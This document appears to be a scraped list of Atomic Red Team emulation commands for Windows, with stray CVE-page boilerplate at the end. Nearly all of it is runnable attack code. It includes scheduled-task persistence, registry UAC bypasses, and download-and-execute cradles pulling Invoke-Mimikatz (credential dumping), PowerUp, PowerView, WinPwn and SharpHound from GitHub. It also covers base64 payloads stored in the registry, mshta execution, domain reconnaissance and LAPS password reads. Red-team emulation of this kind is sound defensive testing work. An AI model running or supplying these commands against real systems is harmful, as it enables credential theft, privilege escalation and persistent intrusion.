schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time}
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "compmgmt.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's open the Computer Management console now...
compmgmt.msc
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "eventvwr.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's run the schedule task ...
schtasks /Run /TN "EventViewerBypass"
schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"
SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.